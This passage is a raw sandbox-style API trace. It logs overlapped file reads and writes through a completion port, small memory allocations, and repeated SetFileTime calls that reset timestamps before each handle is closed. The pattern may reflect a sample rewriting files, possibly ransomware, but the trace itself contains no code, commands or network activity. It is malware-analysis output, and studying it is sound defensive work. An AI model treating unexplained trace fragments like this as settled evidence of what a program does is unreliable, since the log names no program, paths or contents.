0x2062eb8 [0081.062] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.062] free (_Block=0x2060778) [0081.062] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.062] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.063] free (_Block=0x2062da0) [0081.063] free (_Block=0x53fcc0) [0081.064] free (_Block=0x2062eb8) [0081.064] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0081.064] GetLastError () returned 0x3e5 [0081.064] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.067] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0081.067] GetLastError () returned 0x3e5 [0081.067] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.255] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x2e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.255] GetLastError () returned 0x3e5 [0081.255] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.261] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.261] CloseHandle (hObject=0x3b0) returned 1 [0081.265] free (_Block=0x206b860) [0081.265] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.270] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x324, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0081.270] GetLastError () returned 0x3e5 [0081.271] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.292] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.292] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.292] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.292] free (_Block=0x2060778) [0081.292] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.292] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.293] free (_Block=0x2062da0) [0081.294] free (_Block=0x53fcc0) [0081.294] free (_Block=0x2062eb8) [0081.294] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0081.294] GetLastError () returned 0x3e5 [0081.295] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.325] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.325] CloseHandle (hObject=0x3b0) returned 1 [0081.328] free (_Block=0x206b860) [0081.328] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.351] WriteFile (in: hFile=0x3c0, lpBuffer=0x394007c, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 0x0 [0081.352] GetLastError () returned 0x3e5 [0081.352] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.765] ReadFile (in: hFile=0x3b8, lpBuffer=0x206b894, nNumberOfBytesToRead=0x40e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0081.766] GetLastError () returned 0x3e5 [0081.766] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.891] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.891] CloseHandle (hObject=0x3b8) returned 1 [0081.894] free (_Block=0x206b860) [0081.894] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.921] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x3af9, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.933] GetLastError () returned 0x3e5 [0081.933] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.942] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.942] CloseHandle (hObject=0x3c0) returned 1 [0081.945] free (_Block=0x206b860) [0081.945] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.961] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x264b, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0081.962] GetLastError () returned 0x3e5 [0081.962] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0081.967] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.967] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.967] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.967] free (_Block=0x2060778) [0081.967] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.967] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.968] free (_Block=0x2062da0) [0081.968] free (_Block=0x53fcc0) [0081.968] free (_Block=0x2062eb8) [0081.969] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.969] GetLastError () returned 0x3e5 [0081.969] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0086.563] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0086.563] GetLastError () returned 0x3e5 [0086.563] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0086.597] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0086.597] GetLastError () returned 0x3e5 [0086.597] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0087.594] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0087.594] GetLastError () returned 0x3e5 [0087.594] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0087.595] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0087.598] CloseHandle (hObject=0x3c0) returned 1 [0087.605] free (_Block=0x20abae0) [0087.605] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0087.625] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x39c, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0087.625] GetLastError () returned 0x3e5 [0087.625] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0087.625] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0087.625] CloseHandle (hObject=0x3c4) returned 1 [0087.627] free (_Block=0x206b860) [0087.627] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0087.953] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0087.953] CloseHandle (hObject=0x3c4) returned 1 [0087.954] free (_Block=0x20abae0) [0087.954] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0087.960] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x2ed, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0087.960] GetLastError () returned 0x3e5 [0087.960] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0087.960] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0088.016] CloseHandle (hObject=0x3b0) returned 1 [0088.017] free (_Block=0x206b860) [0088.017] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0088.126] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0088.127] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0088.127] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0088.127] free (_Block=0x2060778) [0088.127] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0088.127] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0088.127] free (_Block=0x2062da0) [0088.127] free (_Block=0x53fcc0) [0088.127] free (_Block=0x2062eb8) [0088.127] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0088.128] GetLastError () returned 0x3e5 [0088.128] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0088.135] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0088.135] GetLastError () returned 0x3e5 [0088.136] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0088.407] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0088.407] GetLastError () returned 0x3e5 [0088.407] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0089.402] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0089.402] GetLastError () returned 0x3e5 [0089.402] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0089.616] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0089.616] GetLastError () returned 0x3e5 [0089.616] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0089.655] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0089.655] GetLastError () returned 0x3e5 [0089.655] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0090.930] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0090.930] GetLastError () returned 0x3e5 [0090.930] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0091.063] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0091.063] GetLastError () returned 0x3e5 [0091.063] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0091.090] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0091.090] GetLastError () returned 0x3e5 [0091.090] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0091.571] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0091.571] CloseHandle (hObject=0x3bc) returned 1 [0091.823] free (_Block=0x206b860) [0091.823] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0091.830] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0091.830] CloseHandle (hObject=0x3c0) returned 1 [0092.343] free (_Block=0x20abae0) [0092.343] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0095.181] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0095.181] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0095.181] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0095.181] free (_Block=0x2060778) [0095.181] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0095.182] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0095.182] free (_Block=0x2062da0) [0095.182] free (_Block=0x53fcc0) [0095.182] free (_Block=0x2062eb8) [0095.182] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0095.182] GetLastError () returned 0x3e5 [0095.182] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0095.187] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0095.188] GetLastError () returned 0x3e5 [0095.188] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0095.331] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0095.331] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0095.331] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0095.332] free (_Block=0x2060778) [0095.332] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0095.332] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0095.332] free (_Block=0x2062da0) [0095.332] free (_Block=0x53fcc0) [0095.332] free (_Block=0x2062eb8) [0095.332] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0095.335] GetLastError () returned 0x3e5 [0095.335] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0095.351] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0095.351] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0095.351] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0095.351] free (_Block=0x2060778) [0095.351] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0095.351] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0095.352] free (_Block=0x2062da0) [0095.352] free (_Block=0x53fcc0) [0095.352] free (_Block=0x2062eb8) [0095.352] WriteFile (in: hFile=0x3d0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0095.355] GetLastError () returned 0x3e5 [0095.355] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0095.359] WriteFile (in: hFile=0x3d0, lpBuffer=0x394007c, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 0x0 [0095.432] GetLastError () returned 0x3e5 [0095.432] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, 